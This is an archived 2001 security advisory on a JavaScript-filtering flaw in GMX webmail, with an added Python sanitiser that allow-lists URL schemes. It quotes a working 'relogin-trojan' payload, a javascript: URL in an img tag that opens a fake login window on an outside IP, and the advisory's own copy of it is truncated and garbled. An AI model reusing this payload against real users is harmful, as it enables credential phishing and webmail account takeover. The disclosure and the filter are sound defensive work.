SecurityTracker.com
Category:   Application (E-mail Server)  >   Gmx.net
Vendors:   GMX
Gmx.net Web-Based E-mail System Lets Remote Users Execute Arbitrary Code on the User's Browser
SecurityTracker Alert ID:  1001730
SecurityTracker URL:  http://securitytracker.com/id/1001730
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 12 2001
Impact:   Execution of arbitrary code via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability has been reported in the gmx.net web-based e-mail system that lets remote users execute arbitrary code on the user's browser.

The system reportedly fails to properly filter JavaScript in HTML-based e-mail messages.

A remote user can place JavaScript in the src attribute of an <img> tag by using a javascript: URL.

An example demonstration trojan is provided:

<html><body> <img src="javascript:
gmx=window.open('http://[host]/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resi
.focus();">
<h4>mungo baby</h4></body></html>

Impact:   A remote user can send HTML-based e-mail to a user such that the user's browser will execute trojan JavaScript code when the e-mail is viewed (this requires JavaScript to be enabled in the user's browser).
Solution:   The vendor is preparing a fix, to be released shortly.
Vendor URL:  www.gmx.net/
Cause:   Input validation error
Underlying OS:  

Message History:   None.
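
The check whose absence the advisory describes, as an added example (not GMX's code and not part of the original advisory): a Python filter that allow-lists URL schemes in URL-bearing attributes of HTML mail, after decoding entities and removing the whitespace browsers ignore. The attribute list, scheme list and sample message are assumptions; the filter goes beyond the single <img src> case reported here and covers only URL schemes, not script elements or event-handler attributes.

```python
import re
from html import escape
from html.parser import HTMLParser

# Assumed policy (not from the advisory): URL-bearing attributes, allowed schemes.
URL_ATTRS = {"src", "href", "background", "lowsrc", "dynsrc", "action"}
SAFE_SCHEMES = {"http", "https", "cid", "mailto"}

def url_scheme(value):
    """Scheme as a browser resolves it, or None for a relative URL."""
    # Browsers trim leading controls/spaces and drop TAB/CR/LF anywhere in a URL.
    cleaned = re.sub(r"^[\x00-\x20]+|[\t\r\n]", "", value)
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", cleaned)
    return m.group(1).lower() if m else None

class MailHtmlFilter(HTMLParser):
    """Re-emit HTML, dropping URL attributes whose scheme is not allow-listed."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped = [], []

    def handle_starttag(self, tag, attrs):
        kept = []
        for name, value in attrs:  # names arrive lower-cased, values entity-decoded
            scheme = url_scheme(value or "") if name in URL_ATTRS else None
            if scheme is not None and scheme not in SAFE_SCHEMES:
                self.dropped.append((tag, name, scheme))
                continue
            kept.append(f" {name}" if value is None else f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # emit <br/> as <br>, no stray </br>

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def filter_mail_html(html):
    """Return (filtered_html, [(tag, attribute, scheme), ...] that were removed)."""
    f = MailHtmlFilter()
    f.feed(html)
    f.close()
    return "".join(f.out), f.dropped

# Constructed sample: harmless void(0) bodies stand in for a real script.
SAMPLE = ('<html><body><img src="javascript:\nvoid(0)">'
          '<img SRC="Jav&#x09;aScript:void(0)">'
          '<img src="cid:logo@example.invalid" alt="logo"><h4>hello</h4></body></html>')
```

`filter_mail_html(SAMPLE)` returns the rewritten markup together with a list of the removed attributes, which can be logged for detection.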


 Source Message Contents

Date:  Mon, 11 Jun 2001 09:31:04
Subject:  gmx.net



good morning bugtraq,

gmx.net is a european-based free web-mail-, web-community system comparable 
with hotmail.com.

like many other web-mail systems gmx.net has a problem filtering java-script 
in html-based mail-messages.

this enables an attacker to create html-messages with malicious java-script 
embedded.

problem description:

the html - <img> tag can be used to embed malicious
java-scripts within html-mails

once the "html-mailpart" is opened by the gmx-user it is possible
the "embedded" java-script is executed by the web-browser (if enabled :-) this 
makes it possible to place trojans and execute URL-based webmail-commands 
leading to a compromise of the user's webmail-account.

sample with "classic" relogin-trojan:

---cut here---

<html><body> <img src="javascript: 
gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx
.focus();">
<h4>mungo baby</h4></body></html>

---cut here---

.. not very sophisticated but working... changing user-options would be more 
elaborate ..


nice day,


rc

rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com





vendor status: mail has been sent to security@gmx.net


RC-EOF


 
 



Copyright 2012, SecurityGlobal.net LLC